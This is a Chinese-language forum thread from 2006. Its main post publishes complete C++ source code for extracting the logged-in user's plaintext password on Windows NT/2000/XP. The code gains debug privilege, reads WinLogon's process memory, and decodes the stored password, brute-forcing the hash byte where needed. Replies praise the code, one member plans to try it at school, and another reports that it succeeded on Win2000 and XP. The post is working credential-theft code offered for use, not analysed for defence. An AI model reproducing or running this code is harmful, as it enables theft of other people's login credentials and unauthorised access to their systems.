六翼黑帝斯註冊會員榮譽勳章勳章總數 UID - 216546 在線等級: 註冊日期: 2005-12-02 VIP期限: 2007-03 住址: 真實的內心文章: 746 精華: 0 現金: 799 金幣資產: 799 金幣	超強~ 這招先學著以後在學校玩玩看!!@@...

	送花文章: 3, 收花文章: 5 篇, 收花: 8 次

2006-09-23, 01:56 PM	#8 (permalink)
psac 榮譽會員榮譽勳章勳章總數19 UID - 3662 在線等級: 註冊日期: 2002-12-07 住址: 木柵市立動物園文章: 17381 精華: 2 現金: 5253 金幣資產: 33853 金幣	教你如何獲取windows2000當前用戶的密碼本文所用的代碼原創作者已不知.是ccrun的一個朋友磨刀老頭提供給的,在此對作者表示感謝.經ccrun(老妖)在Win2k下試驗成功. // 獲取WinNT/Win2k當前用戶名和密碼，呼叫以下函數即可： // bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) //--------------------------------------------------------------------------- typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; }UNICODE_STRING, PUNICODE_STRING; typedef struct _QUERY_SYSTEM_INFORMATION { DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; }QUERY_SYSTEM_INFORMATION, PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER { DWORD Count; DWORD Unk04; DWORD Unk08; }PROCESS_INFO_HEADER, PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO { DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name [0x108]; }PROCESS_INFO, PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO { DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; }ENCODED_PASSWORD_INFO, PENCODED_PASSWORD_INFO; typedef DWORD (__stdcall PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (__stdcall PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (__stdcall PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (__stdcall PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (__stdcall PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); // Private Prototypes BOOL IsWinNT(void); BOOL IsWin2K(void); BOOL AddDebugPrivilege(void); DWORD FindWinLogon(void); BOOL LocatePasswordPageWinNT(DWORD, PDWORD); BOOL LocatePasswordPageWin2K(DWORD, PDWORD); void ReturnWinNTPwd(String &, String &, String &); void ReturnWin2kPwd(String &, String &, String &); bool GetPassword(String &, String &, String &); // Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD dwPwdLen = 0; PVOID pvRealPwd = NULL; PVOID pvPwd = NULL; DWORD dwHashByte = 0; wchar_t wszUserName[0x400]; wchar_t wszUserDomain[0x400]; //--------------------------------------------------------------------------- bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) { if(!IsWinNT() && !IsWin2K()) { // 只適合於2000或者xp return false; } // Add debug privilege to PasswordReminder - // this is needed for the search for Winlogon. if(!AddDebugPrivilege()) { // 不能夠新增debug特權 return false; } // debug特權已經成功加入到本程式 HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL"); pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress(hNtDll,"NtQuerySystemInformation"); pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer"); pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation"); pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer"); pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString"); // Locate WinLogon's PID - need debug privilege and admin rights. DWORD dwWinLogonPID = FindWinLogon (); if(!dwWinLogonPID) { // 找不到工作行程WinLogon 或者正在使用 NWGINA.DLL // 導致不能在記憶體中找到密碼 FreeLibrary(hNtDll); return false; } // Format("主工作行程WinLogon的id是 %d (0x%8.8x).\n", // ARRAYOFCONST(((int)dwWinLogonPID, (int)dwWinLogonPID)))); // Set values to check memory block against. memset(wszUserName, 0, sizeof (wszUserName)); memset(wszUserDomain, 0, sizeof (wszUserDomain)); GetEnvironmentVariableW(L"USERNAME",wszUserName,0x400); GetEnvironmentVariableW(L"USERDOMAIN", wszUserDomain, 0x400); // Locate the block of memory containing // the password in WinLogon's memory space. BOOL bFoundPasswordPage; //bFoundPasswordPage = FALSE; if(IsWin2K()) bFoundPasswordPage = LocatePasswordPageWin2K(dwWinLogonPID, &dwPwdLen); else bFoundPasswordPage = LocatePasswordPageWinNT(dwWinLogonPID, &dwPwdLen); if(bFoundPasswordPage) { if(dwPwdLen == 0) { // Format("登入訊息為: 域名：%S/密碼：%S.\n", // ARRAYOFCONST((wszUserDomain, wszUserName)))); // 密碼長度為空，系統沒有密碼 } else { // Format("找到了密碼，長度為%d\n", ARRAYOFCONST(((int)dwPwdLen)))); // Decode the password string. if(IsWin2K()) ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd); else ReturnWinNTPwd(strCurrDomain, strCurrUser, strCurrPwd); } } else { FreeLibrary(hNtDll); return false; }// 沒有在記憶體中間找到密碼 return true; } //--------------------------------------------------------------------------- BOOL IsWinNT(void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if(GetVersionEx(&OSVersionInfo)) return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT); else return (FALSE); } //--------------------------------------------------------------------------- BOOL IsWin2K(void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx(&OSVersionInfo)) return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) && (OSVersionInfo.dwMajorVersion == 5)); else return (FALSE); } //--------------------------------------------------------------------------- BOOL AddDebugPrivilege(void) { HANDLE Token; TOKEN_PRIVILEGES TokenPrivileges, PreviousState; DWORD ReturnLength = 0; if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY \| TOKEN_ADJUST_PRIVILEGES, &Token)) if(LookupPrivilegeValue(NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid)) { TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; return (AdjustTokenPrivileges(Token, FALSE, &TokenPrivileges, sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength)); } return (FALSE); } //--------------------------------------------------------------------------- // 本文是ccrun(老妖)的一個朋友提供的代碼.有問題或建議請致信:info@ccrun.com // 歡迎光臨C++ Builder 研究 http://www.ccrun.com //--------------------------------------------------------------------------- // Note that the following code eliminates the need // for PSAPI.DLL as part of the executable. DWORD FindWinLogon(void) { #define INITIAL_ALLOCATION 0x100 DWORD dwRc = 0; DWORD dwSizeNeeded = 0; PVOID pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION); // Find how much memory is required. pfnNtQuerySystemInformation(0x10, pvInfo, INITIAL_ALLOCATION, &dwSizeNeeded); HeapFree(GetProcessHeap(), 0, pvInfo); // Now, allocate the proper amount of memory. pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSizeNeeded); DWORD dwSizeWritten = dwSizeNeeded; if(pfnNtQuerySystemInformation(0x10, pvInfo, dwSizeNeeded, &dwSizeWritten)) { HeapFree(GetProcessHeap(), 0, pvInfo); return (0); } DWORD dwNumHandles = dwSizeWritten / sizeof (QUERY_SYSTEM_INFORMATION); if(dwNumHandles == 0) { HeapFree(GetProcessHeap(), 0, pvInfo); return (0); } PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) pvInfo; try { for(DWORD i=1; i<=dwNumHandles; i++) { // "5" is the value of a kernel object type process. if (QuerySystemInformationP->HandleType == 5) { PVOID pvDebugBuffer = pfnRtlCreateQueryDebugBuffer(0, 0); if(pfnRtlQueryProcessDebugInformation (QuerySystemInformationP->PID, 1, pvDebugBuffer) == 0) { PPROCESS_INFO_HEADER pihProcessInfoHeader = (PPROCESS_INFO_HEADER)((DWORD)pvDebugBuffer + 0x60); DWORD dwCount = pihProcessInfoHeader->Count; PPROCESS_INFO piProcessInfo = (PPROCESS_INFO) ((DWORD)pihProcessInfoHeader + sizeof (PROCESS_INFO_HEADER)); // Form1->Memo1->Lines->Add(piProcessInfo->Name); AnsiString strName = piProcessInfo->Name; // if(strstr((char )UpCase(piProcessInfo->Name), "WINLOGON") != 0) if(strName.UpperCase().Pos("WINLOGON") != 0) { DWORD dwTemp = (DWORD)piProcessInfo; for (DWORD j=0; j<dwCount; j++) { dwTemp += sizeof (PROCESS_INFO); piProcessInfo = (PPROCESS_INFO)dwTemp; strName = piProcessInfo->Name; if(strName.UpperCase().Pos("NWGINA") !=0 ) return (0); if(strName.UpperCase().Pos("MSGINA") !=0 ) dwRc =QuerySystemInformationP->PID; } if(pvDebugBuffer) pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer); HeapFree(GetProcessHeap(), 0, pvInfo); return (dwRc); } } if (pvDebugBuffer) pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer); } DWORD dwTemp = (DWORD)QuerySystemInformationP; dwTemp += sizeof(QUERY_SYSTEM_INFORMATION); QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION)dwTemp; } } catch(...) {} HeapFree(GetProcessHeap(), 0, pvInfo); return (dwRc); } //--------------------------------------------------------------------------- BOOL LocatePasswordPageWinNT(DWORD dwWinLogonPID, PDWORD pdwPwdLen) { #define USER_DOMAIN_OFFSET_WINNT 0x200 #define USER_PASSWORD_OFFSET_WINNT 0x400 BOOL bRc = FALSE; HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION \| PROCESS_VM_READ, FALSE, dwWinLogonPID); if(!hWinLogonHandle) return (bRc); pdwPwdLen = 0; SYSTEM_INFO siSystemInfo; GetSystemInfo(&siSystemInfo); DWORD dwPEB = 0x7ffdf000; DWORD dwBytesCopied = 0; PVOID pvEBP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, siSystemInfo.dwPageSize); if(!ReadProcessMemory(hWinLogonHandle, (PVOID)dwPEB, pvEBP, siSystemInfo.dwPageSize, &dwBytesCopied)) { CloseHandle(hWinLogonHandle); return (bRc); } // Grab the value of the 2nd DWORD in the TEB. PDWORD pdwWinLogonHeap = (PDWORD)((DWORD)pvEBP + (6 sizeof (DWORD))); MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor; if(VirtualQueryEx(hWinLogonHandle, (PVOID) pdwWinLogonHeap, &mbiMemoryBasicInfor, sizeof(MEMORY_BASIC_INFORMATION))) if(((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) && ((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0)) { PVOID pvWinLogonMem = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, mbiMemoryBasicInfor.RegionSize); if(ReadProcessMemory(hWinLogonHandle, (PVOID)pdwWinLogonHeap, pvWinLogonMem, mbiMemoryBasicInfor.RegionSize, &dwBytesCopied)) { DWORD i = (DWORD)pvWinLogonMem; DWORD dwUserNamePos = 0; // The order in memory is wszUserName followed by the wszUserDomain. do { if((wcscmp(wszUserName, (wchar_t )i) == 0) && (wcscmp(wszUserDomain, (wchar_t ) (i + USER_DOMAIN_OFFSET_WINNT)) == 0)) { dwUserNamePos = i; break; } i += 2; }while(i < (DWORD)pvWinLogonMem + mbiMemoryBasicInfor.RegionSize); if(dwUserNamePos) { PENCODED_PASSWORD_INFO pepiEncodedPwdInfo = (PENCODED_PASSWORD_INFO)((DWORD)dwUserNamePos + USER_PASSWORD_OFFSET_WINNT); FILETIME ftLocalFileTime; SYSTEMTIME stSystemTime; if(FileTimeToLocalFileTime(&pepiEncodedPwdInfo->LoggedOn, &ftLocalFileTime)) if(FileTimeToSystemTime(&ftLocalFileTime, &stSystemTime)) {} // Format("你的登入時間為： %d/%d/%d %d:%d:%d\n", // ARRAYOFCONST((stSystemTime.wMonth, stSystemTime.wDay, // stSystemTime.wYear, stSystemTime.wHour, // stSystemTime.wMinute, stSystemTime.wSecond)))); pdwPwdLen = (pepiEncodedPwdInfo->EncodedPassword.Length & 0x00ff) / sizeof (wchar_t); dwHashByte = (pepiEncodedPwdInfo->EncodedPassword.Length & 0xff00) >> 8; pvRealPwd = (PVOID)(pdwWinLogonHeap + (dwUserNamePos - (DWORD)pvWinLogonMem) + USER_PASSWORD_OFFSET_WINNT + 0x34); pvPwd = (PVOID)((PBYTE)(dwUserNamePos + USER_PASSWORD_OFFSET_WINNT + 0x34)); bRc = TRUE; } } } HeapFree(GetProcessHeap(), 0, pvEBP); CloseHandle(hWinLogonHandle); return (bRc); } //--------------------------------------------------------------------------- BOOL LocatePasswordPageWin2K(DWORD dwWinLogonPID, PDWORD pdwPwdLen) { #define USER_DOMAIN_OFFSET_WIN2K 0x400 #define USER_PASSWORD_OFFSET_WIN2K 0x800 HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION \| PROCESS_VM_READ, FALSE, dwWinLogonPID); if(hWinLogonHandle == 0) return (FALSE); pdwPwdLen = 0; SYSTEM_INFO siSystemInfo; GetSystemInfo(&siSystemInfo); DWORD i = (DWORD)siSystemInfo.lpMinimumApplicationAddress; DWORD dwMaxMemory = (DWORD) siSystemInfo.lpMaximumApplicationAddress; DWORD dwIncrement = siSystemInfo.dwPageSize; MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor; while(i < dwMaxMemory) { if(VirtualQueryEx(hWinLogonHandle, (PVOID)i, &mbiMemoryBasicInfor, sizeof (MEMORY_BASIC_INFORMATION))) { dwIncrement = mbiMemoryBasicInfor.RegionSize; if (((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) && ((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0)) { PVOID pvRealStartingAddress = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, mbiMemoryBasicInfor.RegionSize); DWORD dwBytesCopied = 0; if(ReadProcessMemory(hWinLogonHandle, (PVOID)i, pvRealStartingAddress, mbiMemoryBasicInfor.RegionSize, &dwBytesCopied)) { if((wcscmp((wchar_t )pvRealStartingAddress, wszUserName) == 0) && (wcscmp((wchar_t )((DWORD)pvRealStartingAddress + USER_DOMAIN_OFFSET_WIN2K), wszUserDomain) == 0)) { pvRealPwd = (PVOID)(i + USER_PASSWORD_OFFSET_WIN2K); pvPwd = (PVOID)((DWORD)pvRealStartingAddress + USER_PASSWORD_OFFSET_WIN2K); // Calculate the length of encoded unicode string. PBYTE pbTemp = (PBYTE)pvPwd; DWORD dwLoc = (DWORD)pbTemp; DWORD dwLen = 0; if((pbTemp == 0) && ((PBYTE)((DWORD)pbTemp + 1) == 0)) {} else do { dwLen++; dwLoc += 2; pbTemp = (PBYTE) dwLoc; }while(pbTemp != 0); pdwPwdLen = dwLen; CloseHandle(hWinLogonHandle); return (TRUE); } } HeapFree(GetProcessHeap(), 0, pvRealStartingAddress); } } else dwIncrement = siSystemInfo.dwPageSize; // Move to next memory block. i += dwIncrement; } CloseHandle(hWinLogonHandle); return (FALSE); } //--------------------------------------------------------------------------- void ReturnWinNTPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) { UNICODE_STRING usEncodedString; usEncodedString.Length = (WORD)dwPwdLen sizeof(wchar_t); usEncodedString.MaximumLength = ((WORD)dwPwdLen * sizeof (wchar_t)) + sizeof(wchar_t); usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, usEncodedString.MaximumLength); CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof(wchar_t)); // Finally - decode the password. // Note that only one call is required since the hash-byte // was part of the orginally encoded string. pfnRtlRunDecodeUnicodeString((BYTE)dwHashByte, &usEncodedString); strCurrDomain = String(wszUserDomain); strCurrUser = String(wszUserName); strCurrPwd = AnsiString(usEncodedString.Buffer); // Format("你的登入訊息是域名：%S 用戶名：%S 密碼：%S\n", // ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer)))); // Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)dwHashByte)))); HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer); } //--------------------------------------------------------------------------- void ReturnWin2kPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) { // DWORD dwHash = 0; UNICODE_STRING usEncodedString; usEncodedString.Length = (USHORT)dwPwdLen * sizeof(wchar_t); usEncodedString.MaximumLength = ((USHORT)dwPwdLen * sizeof(wchar_t)) + sizeof(wchar_t); usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, usEncodedString.MaximumLength); // This is a brute force technique since the hash-byte // is not stored as part of the encoded string - :>(. for(DWORD i=0; i<=0xff; i++) { CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof (wchar_t)); // Finally - try to decode the password. pfnRtlRunDecodeUnicodeString((BYTE)i, &usEncodedString); // Check for a viewable password. PBYTE pbTemp = (PBYTE)usEncodedString.Buffer; BOOL bViewable = TRUE; DWORD j, k; for(j=0; (j<dwPwdLen) && bViewable; j++) { if((pbTemp) && ((PBYTE)(DWORD(pbTemp) + 1) == 0)) { if(pbTemp < 0x20) bViewable = FALSE; if(pbTemp > 0x7e) bViewable = FALSE; } else bViewable = FALSE; k = DWORD(pbTemp); k += 2; pbTemp = (PBYTE)k; } if(bViewable) { strCurrDomain = String(wszUserDomain); strCurrUser = String(wszUserName); strCurrPwd = String(usEncodedString.Buffer); // Format("你的登入訊息為: 域名：%S 用戶名：%S 密碼：%S\n", // ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer)))); // Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)i)))); } } HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer); } //--------------------------------------------------------------------------- // 呼叫舉例 void __fastcall TForm1::Button1Click(TObject *Sender) { String strCurrDomain, strCurrUser, strCurrPwd; GetPassword(strCurrDomain, strCurrUser, strCurrPwd); Memo1->Lines->Add(strCurrDomain); Memo1->Lines->Add(strCurrUser); Memo1->Lines->Add(strCurrPwd);
	__________________
	送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次

2006-10-07, 06:31 PM	#9 (permalink)
koma 榮譽勳章勳章總數 UID - 在線等級: 文章: n/a 精華:	謝謝分享支持一下
koma 榮譽勳章勳章總數 UID - 在線等級: 文章: n/a 精華:
	送花文章: 0, 收花文章: 0 篇, 收花: 0 次

2006-10-11, 05:42 PM	#10 (permalink)
p933272349 註冊會員榮譽勳章勳章總數 UID - 254094 在線等級: 註冊日期: 2006-09-22 文章: 3 精華: 0	恩好厲害..非常感謝

	送花文章: 3, 收花文章: 0 篇, 收花: 0 次

2006-10-12, 04:57 PM	#11 (permalink)
lew 註冊會員榮譽勳章勳章總數2 UID - 16444 在線等級: 註冊日期: 2002-12-23 VIP期限: 2009-05 住址: WOMAN'S HOME 文章: 294 精華: 0 現金: 5909 金幣資產: 10909 金幣	哇~~好厲害喔~!

	送花文章: 135, 收花文章: 14 篇, 收花: 70 次

2006-10-23, 01:42 AM	#12 (permalink)
乃乃註冊會員榮譽勳章勳章總數8 UID - 17150 在線等級: 註冊日期: 2002-12-24 VIP期限: 2011-04 住址: 共享星球文章: 2781 精華: 0 現金: -7 金幣資產: 78138864 金幣	沒想到還能DL，謝謝大大無私分享^^

	送花文章: 3104, 收花文章: 92 篇, 收花: 212 次

2006-10-23, 06:21 PM	#14 (permalink)
藍色協奏曲註冊會員榮譽勳章勳章總數9 UID - 12748 在線等級: 註冊日期: 2002-12-16 住址: 史政院-走丟了高等研究院文章: 1061 精華: 0 現金: 757 金幣資產: 780567 金幣	絕對有用,以win2000和winxp都是破解成功的! 在對win2x server中(大型serveru,也就是有raid,請先把raid卡驅動程式裝上)然後在用erd開機!

	送花文章: 1099, 收花文章: 354 篇, 收花: 1561 次

2006-10-24, 08:27 PM	#15 (permalink)
tone20130 榮譽勳章勳章總數 UID - 在線等級: 文章: n/a 精華:	刀射啦！！！！
tone20130 榮譽勳章勳章總數 UID - 在線等級: 文章: n/a 精華:
	送花文章: 0, 收花文章: 0 篇, 收花: 0 次

主題工具
顯示可列印版本郵寄本頁給好友
顯示模式
平板模式切換到混合模式切換到樹形模式

Google 提供的廣告